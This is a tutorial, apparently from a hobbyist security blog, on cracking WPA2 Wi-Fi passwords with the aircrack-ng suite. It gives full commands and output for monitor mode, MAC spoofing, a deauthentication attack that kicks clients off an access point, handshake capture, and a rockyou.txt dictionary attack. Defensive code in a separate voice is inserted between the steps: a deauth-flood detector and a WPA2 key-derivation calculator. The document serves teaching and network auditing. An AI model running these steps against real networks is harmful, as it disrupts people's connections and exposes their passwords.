Aircrack WPA/WPA2 Wi-Fi Passwords

This tutorial is intended for you to test YOUR OWN NETWORK INFRASTRUCTURE AND HARDWARE, OR NETWORK INFRASTRUCTURE and hardware you have specific permission to audit[1]. I am not a lawyer, I am not your lawyer and you really shouldn’t do anything stupid or bad with the information contained in this post.

If you’re just learning to hack, follow this simple principle: do not hack things without permission[2].

What you should do is learn this stuff and make your networks, and any network you are responsible for, that much more difficult to pop.

Text, Video or Pictures

Depending on what type of learning you prefer it might be easier for you to watch a video of this process, that video is at the end of this post.

Assumptions

This post assumes you have a Raspberry Pi 3B+ (RPi) running the operating system Raspbian Stretch Lite. It’s important to use the light version as it doesn’t contain anything you don’t need. Anything you do need you can install.

You will also need a Wi-Fi adapter that you can put into Monitor Mode, on this version of the RPi it is possible to do that but I would definitely recommend splashing out the 20 to 30 quid on an Alfa USB Wi-Fi radio. I’ve tried loads of them but I always end up coming back to the Alfa AWUS036NHA USB Wi-Fi radio.

Install The Necessary Software

First we need to install the software we are going to need to hack all the packets! The software packages we are going to install are:

  • wget & curl For grabbing things from the Internet
  • iw For monkeying with network connections
  • aircrack-ng For grabbing handshakes and attempting to guess the password
  • macchanger To give us a random MAC address

Install wget & curl

sudo apt install wget curl

Install iw

sudo apt install iw

Install Aircrack Suite

sudo apt install aircrack-ng

Install macchanger

sudo apt install macchanger

Hunt the Radio!

On the RPi the interface named wlan0[3] tends to be the Wi-Fi radio on the RPi itself, and whilst it’s possible to use the on-board Wi-Fi in Monitor Mode, you will get much better results (range, signal strength etc.) with the USB Wi-Fi radio. That being said, it’s time to find out whether the RPi recognises your USB Wi-Fi radio.

Find Your USB Radio

To find out if your radio is connected run the following command in your Terminal:

lsusb

Which will hopefully output something in the terminal that looks like this:

Bus 001 Device 004: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

If you’re not sure which USB device is your Wi-Fi radio, unplug the radio and run the command again. You should be able to see what’s missing.

Is It Can Be Wireless?

We need to check whether your USB radio can be used in a Usefully Wireless Way™. Run the command below to find out:

Test USB Antenna Usefulness

iwconfig

The results of this command should contain something like the following (if they do you are onto a winner):

iwconfig Command Output

wlan1     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Time Spent On Reconnaissance Is Seldom Wasted

airmon-ng is part of the aircrack-ng suite of tools, which we’re going to use to place our wireless interface into the right modes. Let’s see which wireless interfaces airmon-ng is aware of, and can therefore use, by running:

Check Useful Wi-Fi Interfaces

airmon-ng

Which should give you the following output. The one we are going to be acting upon is called: wlan1.

Airmon-ng Output

PHY Interface   Driver      Chipset

phy0    wlan0       brcmfmac    Broadcom 43430
phy1    wlan1       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

Monitor Mode

For the software to do the things that it does, the antenna needs to be put in a state known as Monitor Mode. We do this by simply issuing the following command: (The command may vary slightly if your Wi-Fi adapter has a different name.)

Put wlan1 into Monitor Mode

airmon-ng start wlan1

This is a pretty typical output from the command above. As you can see a new Monitor Mode network interface has been created called: wlan1mon. Without putting your radio into Monitor Mode, nothing that follows will work.

Airmon-ng start wlan1 Output

PHY Interface   Driver      Chipset

phy0    wlan0       brcmfmac    Broadcom 43430
phy1    wlan1       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

        (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
        (mac80211 station mode vif disabled for [phy1]wlan1)

Sneaky Beaky

Now, I know that you’ve got full permission to go after this particular access point, so you might wonder why you need to mask your computer’s identity by changing the MAC address. Well, you don’t. But if you intend to start a career in penetration testing, then developing the habit of routinely masking your computer’s identity and not leaking any personally identifiable information will serve you well. Changing your MAC address is a very basic step that you can take, and you can do it with macchanger.

Take Down Monitor Mode Interface Temporarily

ifconfig wlan1mon down

Temporarily change your MAC Address

macchanger -r wlan1mon

This will output something like the following. (-r assigns a fully random address; -p would do the opposite and restore the permanent hardware MAC.) Do not be tempted to set a random MAC address permanently. The reason we are changing the MAC address is to get rid of any permanent identifiers, so get into the habit of doing this each time you run the process.[4]

macchanger Output

Current MAC:   00:25:22:XX:XX:XX (ASRock Incorporation)
Permanent MAC: 00:25:22:XX:XX:XX (ASRock Incorporation)
New MAC:       00:11:22:XX:XX:XX (CIMSYS Inc)

The following brings the Monitor Mode Wi-Fi interface back up so that we can use it for the rest of the tutorial:

Bring Monitor Mode Interface Back Up

ifconfig wlan1mon up

Let’s Get Scanning

Now we get to the good part. Here is a video of the process from installing the software to beginning the scanning process. I would recommend reading the text instructions as well but lots of people find these videos useful:

Airmon-ng & Airodump-ng

Use the following command to do a survey of all of the Wi-Fi access points and clients that are within range of your machine:

NOTE: your monitoring interface may be called something other than wlan1mon. Replace the name of your interface in the commands below where necessary.

Initial Airodump-ng Scan

airodump-ng wlan1mon

You will get output looking like this. I have again redacted some of the information to protect the guilty:

Airodump-ng Scan Output

CH  8 ][ Elapsed: 18 s ][ 2019-03-28 22:16 ][ sorting by beacon number

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

2C:FD:A1:XX:XX:XX  -45       13      132   14   9   54  WPA2 CCMP   PSK  Pretty Fly for a Wi-Fi
B8:27:EB:XX:XX:XX  -38       13       43    0   7   54  WPA2 CCMP   PSK  PiFi

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

2C:FD:A1:XX:XX:XX  40:B4:CD:XX:XX:XX  -36    0e-24e     8       58
2C:FD:A1:XX:XX:XX  D0:73:D5:XX:XX:XX  -62    1 -11      0        2
B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -28    0 -48      0       22
B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -70    0 - 5      0

Pick On A Target

Okay, now we need to choose a victim (or, you know, a client we are legally allowed to test). In this instance it will be my access point called PiFi, and the name of the game is to capture the 4-Way Handshake. This is a cryptographic exchange which takes place each time a device associates with a wireless access point. When your mobile phone or laptop connects to your home Wi-Fi it exchanges information with your Wi-Fi router, and one of those exchanges is the 4-Way Handshake. Amongst other things, the 4-Way Handshake contains a hashed form of the Wi-Fi password for that access point: not the password itself, but once we have grabbed it out of the ether we can go about cracking it.

When thinking about target selection you are always going to be much better off choosing a wireless access point that has one or more clients connected to it. While technically you could just leave the command running and wait for somebody to connect to your access point of choice, it’s much quicker to choose one that already has a client you can bump off the network.

TL;DR: We will be running a deauthentication attack.

Picking on the Access Point

airodump-ng -c 7 -w PiFi --bssid B8:27:EB:XX:XX:XX wlan1mon

Command Breakdown:

airodump-ng = Software to monitor Access Points
-c 7 = The channel our chosen victim is on
-w PiFi = The prefix for the capture files airodump-ng writes (here the ESSID of the access point, which is why the capture turns up later as PiFi-01.cap)
--bssid B8:27:EB:XX:XX:XX = The BSSID (MAC address) of our access point (in airodump-ng the short -b option selects a band, so use the long --bssid form here)
wlan1mon = The name of our Monitor Mode interface

You can see that the airodump-ng command we just issued is very similar to the first we did, except it is exclusively focusing on one access point. Your Mac addresses and access point name will be different, but your output will look like this:

Specific Access Point airodump-ng Output

CH  7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ]

BSSID   PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

B8:27:EB:XX:XX:XX  -34 100  186    91   16   7   54  WPA2 CCMP   PSK  PiFi

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -24    0 -48      0        1
B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -58   36 -24     83       88

Bump Them Off!

This is very important: you must leave that running and open up a new terminal for the next command. The purpose of this command is to pick on one of the clients connected to PiFi and try and bump them off the network. When they try to reconnect they will be successful, but during the process we can swipe one of the 4-Way Handshakes they exchange with the access point without them knowing! Mwahaha!

Kick Them Off The Access Point

aireplay-ng -0 50 -e PiFi -a B8:27:EB:XX:XX:XX -c 00:1d:d9:XX:XX:XX wlan1mon

Command Breakdown:

aireplay-ng = Software needed for a deauthentication attack
-0 50 = -0 indicates we want to carry out a deauthentication attack; 50 is a whole number denoting how many packets we should send. YMMV with how many you need to get the job done; I generally use 50 with a fair degree of success.
-e PiFi = The ESSID (name) of our access point
-a B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
-c 00:1d:d9:XX:XX:XX = The MAC address of the CLIENT we want to knock off the access point (one of the STATION addresses from the airodump-ng output)
wlan1mon = The name of our Monitor Mode interface
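The other side of the attack above is spotting it. Deauthentication frames in plain WPA2 are unauthenticated management frames, which is the only reason a third party can send them on the access point's behalf; a monitor-mode capture therefore shows the flood plainly as a burst of deauth/disassoc frames for one BSSID. The script below is an added example, not code from this post or from the aircrack-ng project: it parses the 802.11 MAC header by hand (no scapy), builds a handful of constructed frames with made-up addresses (AP, CLIENT), and raises an alert when a BSSID sees ten or more deauth/disassoc frames within five seconds. The thresholds are assumptions to tune for your network.

```python
# Added example: a small 802.11 deauthentication-flood detector. It is not
# code from the original post or from the aircrack-ng project; it parses the
# 802.11 MAC header by hand (no scapy) and runs over frames constructed below.
from collections import defaultdict, deque

MGMT = 0                     # 802.11 frame type: management
DEAUTH, DISASSOC = 12, 10    # management subtypes that drop a client
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))

def build_mgmt(subtype: int, dst: str, src: str, bssid: str, body: bytes = b"") -> bytes:
    """Build a minimal 802.11 management frame: frame control, duration,
    addr1 (receiver), addr2 (transmitter), addr3 (BSSID), sequence control, body."""
    frame_control = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    return (frame_control + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + b"\x00\x00" + body)

def parse_frame(raw: bytes) -> dict:
    """Decode type/subtype, the three addresses and, for deauth/disassoc,
    the little-endian reason code that follows the 24-byte header."""
    if len(raw) < 24:
        raise ValueError("shorter than an 802.11 MAC header")
    fc = raw[0]
    frame = {
        "type": (fc >> 2) & 0x3,
        "subtype": fc >> 4,
        "addr1": raw[4:10].hex(":"),    # receiver
        "addr2": raw[10:16].hex(":"),   # transmitter
        "bssid": raw[16:22].hex(":"),
    }
    if frame["type"] == MGMT and frame["subtype"] in (DEAUTH, DISASSOC) and len(raw) >= 26:
        frame["reason"] = int.from_bytes(raw[24:26], "little")
    return frame

def detect_deauth_flood(packets, threshold=10, window=5.0):
    """packets: iterable of (timestamp_seconds, raw_frame) in time order.
    Returns one (bssid, first_ts, count) alert per BSSID the first time it
    sees `threshold` or more deauth/disassoc frames inside `window` seconds.
    A single deauth is normal (a client leaving); dozens in a second are not."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for ts, raw in packets:
        f = parse_frame(raw)
        if f["type"] != MGMT or f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        q = recent[f["bssid"]]
        q.append(ts)
        while ts - q[0] > window:        # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append((f["bssid"], q[0], len(q)))
    return alerts

# Constructed sample traffic; the addresses are made up, not from the post.
AP = "b8:27:eb:00:00:01"
CLIENT = "00:c0:ca:00:00:02"
REASON_LEAVING = (3).to_bytes(2, "little")   # reason 3: station is leaving the BSS
REASON_CLASS3 = (7).to_bytes(2, "little")    # reason 7: class 3 frame from non-associated STA

def sample_packets():
    pkts = [(i * 0.1, build_mgmt(8, BROADCAST, AP, AP)) for i in range(30)]   # beacons
    pkts.append((1.0, build_mgmt(DEAUTH, CLIENT, AP, AP, REASON_LEAVING)))   # one normal deauth
    pkts += [(round(20.0 + i * 0.01, 2), build_mgmt(DEAUTH, BROADCAST, AP, AP, REASON_CLASS3))
             for i in range(50)]                                             # 50 in half a second
    return sorted(pkts, key=lambda p: p[0])

if __name__ == "__main__":
    for bssid, first, n in detect_deauth_flood(sample_packets()):
        print(f"deauth flood against {bssid}: {n} frames from t={first}s")
```

The single deauth at t=1.0 never trips the detector, while the burst at t=20 does on its tenth frame. On a real capture you would feed the (timestamp, frame) pairs from the pcap instead of sample_packets(). The direct mitigation is 802.11w Protected Management Frames, which authenticates deauth and disassoc frames so clients discard spoofed ones; it is optional in WPA2 and mandatory in WPA3.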


Success?!

Now, if you look back at the first terminal window that is monitoring the access point, you should see a change if you were successful. In the top right-hand corner of the screen you should see the message [ WPA handshake: B8:27:EB:XX:XX:XX ] with the MAC address of the access point shown. This means you now have a capture file containing a hashed version of the password needed to authenticate with the Wi-Fi access point.

It will probably look something like this:

WPA 4-Way Handshake Captured

CH  7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ][ WPA handshake: B8:27:EB:XX:XX:XX

BSSID   PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

2C:FD:A1:XX:XX:XX  -24   0        0        1    0   9   54  WPA2 CCMP   PSK  The Night's Switch.
B8:27:EB:XX:XX:XX  -34 100      186       91   16   7   54  WPA2 CCMP   PSK  PiFi

BSSID              STATION            PWR   Rate    Lost    Frames  Probe


B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -24    0 -48      0        1
B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -58   36 -24     83       88

The Hard Part

All of this has been leading up to cracking the hashed password and revealing the plaintext version so that we can authenticate with the access point. There are a number of ways to do that, but the most accessible is to use a Dictionary Attack and a piece of software called aircrack-ng. I will post more about this topic in the future as it totally fascinates me.

For now, here’s a quick example of using the tool to try and crack the password.

The Dictionary

A dictionary attack takes a huge list of passwords, hashes each one using the same algorithm as your Wi-Fi access point, and compares the result to the hash we captured in our 4-Way Handshake. If it finds a match then you are successful; however, if the password behind the 4-Way Handshake is not contained in the dictionary then you will be out of luck. These dictionary attacks also take a very long time, and the more you do it the better your dictionaries will get, but this is by no means a foolproof way of getting the password. You are relying upon people’s habit of not using good passwords.
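The "same algorithm as your access point" is fixed by IEEE 802.11i: the pre-shared key (PMK) is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256 bits out. The block below is an added example, not code from this post or from aircrack-ng. It derives the PMK with Python's standard library, checks it against the published 802.11i test vector (passphrase "password", SSID "IEEE"), measures a rough guessing rate on the machine it runs on, and turns a rate into a worst-case cracking time for passphrases of a given shape. The rate figure used in the main block is the k/s value shown in the aircrack-ng output later in this post; the candidate strings and the "PiFi" SSID are constructed inputs.

```python
# Added example, not from the original post or from aircrack-ng: the WPA2-PSK
# key derivation a dictionary attack has to repeat for every candidate, plus
# the arithmetic that turns a guessing rate into an expected cracking time.
import hashlib
import time

ITERATIONS = 4096   # fixed by IEEE 802.11i
PMK_LEN = 32        # 256-bit pairwise master key

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so a table of precomputed PMKs only works for one
    network name; the handshake carries a MIC keyed from this value, never
    the passphrase itself."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), ITERATIONS, PMK_LEN)

def guesses_per_second(ssid: str = "PiFi", sample: int = 200) -> float:
    """Rough single-threaded derivation rate on this machine, measured over
    `sample` constructed candidates (hypothetical inputs, just for timing)."""
    t0 = time.perf_counter()
    for i in range(sample):
        wpa2_pmk(f"candidate{i:05d}", ssid)
    return sample / (time.perf_counter() - t0)

def search_space(alphabet_size: int, length: int) -> int:
    """Number of passphrases of exactly `length` symbols from the alphabet."""
    return alphabet_size ** length

def days_to_exhaust(alphabet_size: int, length: int, rate: float) -> float:
    """Worst-case time to try every passphrase of that shape at `rate` guesses/s."""
    return search_space(alphabet_size, length) / rate / 86400

if __name__ == "__main__":
    # Published IEEE 802.11i test vector, so the derivation can be checked.
    print(wpa2_pmk("password", "IEEE").hex())
    print("same passphrase, other SSID gives a different PMK:",
          wpa2_pmk("password", "IEEE") != wpa2_pmk("password", "PiFi"))
    rate = 168_840.0   # the k/s figure aircrack-ng reports in the output later in this post
    print(f"this machine, one core, pure Python: {guesses_per_second():.0f} PMK/s")
    print(f"rockyou.txt (9,822,769 entries) at {rate:.0f}/s: {9822769 / rate / 60:.1f} min")
    print(f"8 lowercase letters, every combination: {days_to_exhaust(26, 8, rate):.1f} days")
    print(f"12 mixed-case letters and digits: {days_to_exhaust(62, 12, rate):.3g} days")
```

The test vector should come out as f42c6fc5 2df0ebef 9ebb4b90 b38a5f90 2e83fe1b 135a70e2 3aed762e 9710a12e. The numbers are the point for a defender: the 4096 PBKDF2 iterations make each guess deliberately slow, a unique SSID defeats precomputed tables, and a random twelve-character passphrase is out of reach of a dictionary by a factor that no CPU upgrade closes, whereas anything in a leaked list falls in minutes.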

The RockYou List

The rockyou.txt password list is one of the standard dictionary lists of passwords; it appeared out of the mists of time, from who knows when and who knows where… To get your copy of this holy talisman use the following command:

Rock My World

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Cracking the Hashed Password

aircrack-ng -w rockyou.txt -b B8:27:EB:XX:XX:XX PiFi-01.cap

Command Breakdown:

aircrack-ng = Software needed to try cracking a password
-w rockyou.txt = Points at the word list called rockyou.txt
-b B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
PiFi-01.cap = The file we captured earlier containing the 4-Way Handshake

If you managed to capture a hashed password, running the command above will give output like the following. Note the gigantic amount of time this takes; obviously a more powerful CPU generally means a shorter cracking time. But it doesn’t matter how fast your computer is: if the password is not in your dictionary then you will not crack it.


aircrack-ng Output

                              Aircrack-ng 1.5.2

      [00:00:09] 1484/9822769 keys tested (168.84 k/s)

      Time left: 16 hours, 14 minutes, 20 seconds                0.02%

                       Current passphrase: addicted


      Master Key     : 90 DC DF 8F BA AD 8A 78 88 23 19 51 F0 BC 46 B7
                       A1 78 2D 0D 5F 4C 2E FE 72 DE BF F3 43 E8 4E A1

      Transient Key  : D9 78 50 9E FF 4E FE C4 7D 47 10 B9 43 22 6E 10
                       28 32 4B 37 DF A2 61 85 9A E9 F1 5B 28 62 E3 4A
                       5D 61 01 9C CE 39 C7 96 AC 1B B2 47 73 24 D0 9A
                       6D BB 55 A8 B5 B2 3B 11 7D 99 27 14 1B B1 84 ED

      EAPOL HMAC     : C4 91 54 B6 AB 05 CF E7 D8 DF 90 C1 6E 43 56 EC

  1. Yes yes, by audit I obviously mean hack! 

  2. Permission from the owner of the hardware, not your mum! (Unless she owns the hardware, natch) 

  3. There are some reasons this might not be the case, but you will probably be fine and that is out of scope. 

  4. Obviously I have changed my personal MAC address to protect the totally not guilty.